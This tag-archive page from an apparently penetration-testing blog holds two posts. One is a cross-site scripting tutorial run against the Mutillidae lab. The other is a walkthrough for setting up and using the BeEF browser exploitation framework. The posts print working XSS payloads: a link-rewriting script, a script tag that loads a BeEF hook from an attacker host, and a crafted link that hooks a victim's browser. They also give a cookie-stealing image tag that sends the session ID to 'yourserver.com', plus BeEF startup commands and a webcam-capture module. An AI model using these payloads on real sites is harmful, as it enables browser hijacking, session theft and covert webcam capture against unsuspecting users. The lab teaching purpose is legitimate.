Tag Archives: beef

Hacking with Cross Site Scripting

Cross site scripting or XSS is one of the top vulnerabilities of the internet.  In many ways, it is easy to test for.  Actually taking advantage of the vulnerability takes a little more creativity, but it is done every day, and can lead to a full compromise of both your own servers as well as those of your clients.

XSS basically means you are taking input from a user and printing it directly out to the HTML of the page without any kind of input sanitation.  So you can type in some Javascript code, and it will get run.

Setup Your Testbed

Mutillidae has some great XSS examples.  There have already been postings on how to get it setup and get started using Metasploitable 2.  I’ll be using the /mutillidae/index.php?page=dns-lookup.php page.

Attack

How do you find a vulnerable host?

The classic way is to simply add an alert tag, such as <script>alert(‘I am vulnerable’);</script>.  Try it on the Mutillidae page by adding that to the Hostname/IP page.

xss mutillidae

 

How do you attack that host?

First, we want to understand the difference between a reflective or non-persistent attack and a Persistent attack.  The example above is a reflective or non-persistent attack.  Basically whatever you enter in the textbox will be reflected on the next page.

A persistent attack is when the user’s input gets entered into a database, and then later is reflected on some other page as information gets pulled out of a database.  Mutillidae has an example where you can enter a blog posting.  Then any other user can read that blog and be affected by whatever XSS attack was entered.  This is often the more dangerous attack because it can affect more users.

Changing link locations:

Enter the following into the DNS lookup tool:

<script>var link=document.getElementsByTagName("a");link[0].href="http://google.com"</script>

After clicking submit, check out the “Home” page button.  It now goes to Google.com instead.

change home linkSure we’re just hacking ourselves right now.  But try it on one of the persistent XSS URLs (such as the blog posting link).  Now anybody that views your blog post has their Home link changed to google.com.

So we know how to annoy users.  But still not how to hack them.  Lets try hooking into BeEF.  See the previous post on starting/using the program.  Once the program is started, type the following into the box (change the IP for your Backtrack/BeEF installation):

<script src="http://192.168.1.6:3000/hook.js"></script>

Now you’ve hooked your browser into BeEF and you can do anything you want from the BeEF admin panel.  Again, you could hook all sorts of people if this were persistent XSS instead.  You could also just send your friend a link to take advantage of the XSS to hook him:

http://192.168.1.5/mutillidae/index.php?page=capture-data.php&cap=<script src='http://192.168.1.6:3000/hook.js'</script>

You can even obfuscate the javascript with hex or something if you want and it’ll still work.

Other ideas include trying to hijack the user’s session (<img src=”http://yourserver.com?id=javascript.cookie” /> to get cookie and steal the PHPSESSID).  Sometimes people do ping sweeps (you need to load a java module) and other things.

Metasploit has a framework called XSSF that you can try to use.

Other useful links:

Some XSS demos: http://www.thegeekstuff.com/2012/02/xss-attack-examples/
Various ways to test XSS vulnerability: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

BeEF: The Browser Exploitation Framework Project

The last post on exploit kits caused me to look into BeEF.  At first glance, BeEF appears to be an open source browser exploit kit.  With a little more work, perhaps it could be just that, but it is not quite there.  It sure is a neat tool, though, and I’d like to try integrating it into some of my own engagements in the future.  Lets look at it.

Setup BeEF

The tool is already built into Backtrack under /pentest/web/beef.  First you’ll want to enable the metasploit module by editing the /pentest/web/beef/config.yaml file and change the metasploit enable line from false to true:

beef config

 

Then launch metasploit (msfconsole) and start up the API for BeEF to connect to:

load msgrpc ServerHost=127.0.0.1 Pass=abc123

Finally go ahead and start the BeEF server:

# cd /pentest/web/beef
# ./beef
[14:08:02][*] Browser Exploitation Framework (BeEF)
[14:08:02] | Version 0.4.3.6-alpha
[14:08:02] | Website http://beefproject.com
[14:08:02] | Run 'beef -h' for basic help.
[14:08:02] |_ Run 'git pull' to update to the latest revision.
[14:08:02][*] Successful connection with Metasploit.
[14:08:05][*] Loaded 226 Metasploit exploits.
[14:08:05][*] BeEF is loading. Wait a few seconds...
[14:08:06][*] 9 extensions loaded:
[14:08:06] | Demos
[14:08:06] | Autoloader
[14:08:06] | Events
[14:08:06] | XSSRays
[14:08:06] | Requester
[14:08:06] | Metasploit
[14:08:06] | Console
[14:08:06] | Admin UI
[14:08:06] |_ Proxy
[14:08:06][*] 339 modules enabled.
[14:08:06][*] 2 network interfaces were detected.
[14:08:06][+] running on network interface: 127.0.0.1
[14:08:06] | Hook URL: http://127.0.0.1:3000/hook.js
[14:08:06] |_ UI URL: http://127.0.0.1:3000/ui/panel
[14:08:06][+] running on network interface: 192.168.1.6
[14:08:06] | Hook URL: http://192.168.1.6:3000/hook.js
[14:08:06] |_ UI URL: http://192.168.1.6:3000/ui/panel
[14:08:06][*] RESTful API key: 00f4d61986f5adeed4fec94a4eb15da9a8b4c449
[14:08:06][*] HTTP Proxy: http://127.0.0.1:6789
[14:08:06][*] BeEF server started (press control+c to stop)

Using BeEF

The tool has documentation on the wiki here.  The documentation is pretty minimal, but for the most part you can figure it out.

Then you can browse to the admin panel at http://192.168.1.6:3000/ui/panel.  The username and password by default is beef/beef (as specified in the config.yaml file).

Now you need to “hook” a browser.  Simply browse with any web browser to http://192.168.1.6:3000/demos/basic.html or http://192.168.1.6:3000/demos/butcher/index.html.  You’ll see the browser pop up right away on the admin panel, with different exploits based on modules that you can run on the “Commands” tab:

beef interface

 

There is all sorts of little information gathering tidbits you can grab.  One neat module is under Browser, you can grab some webcam pictures.  Once you execute it, your basic.html page automagically changes (give it a minute), asking for permission to run the webcam.  Eventually, you’ll be able to click on the “Module Results History” tab, and you’ll see a base64 encoded version of your image pop up (picture=/9j/4AA….)

beef webcam

 

Copy the base64 text into a file called picture.txt (it’ll start with /9y/ and end in ==).  Then you can decode it in the command line with the following:

$ base64 -d -i picture.txt > picture.jpg

Open up picture.jpg, and you should see your smiling face!

Another interesting test you might try is the Metasploit browser_autopwn feature.  The wiki gives a good job at describing how to run it here.

Conclusion

If you look at the source, all the page does is add in the hook.js file.  The setup of BeEF is really slick.  There just doesn’t seem to be anything terribly useful yet.  It definitely shows the power of Ajax type of programming (in a good way), or how scary XSS can be (in a bad way).  Hopefully it can grow into a more mature, useable project.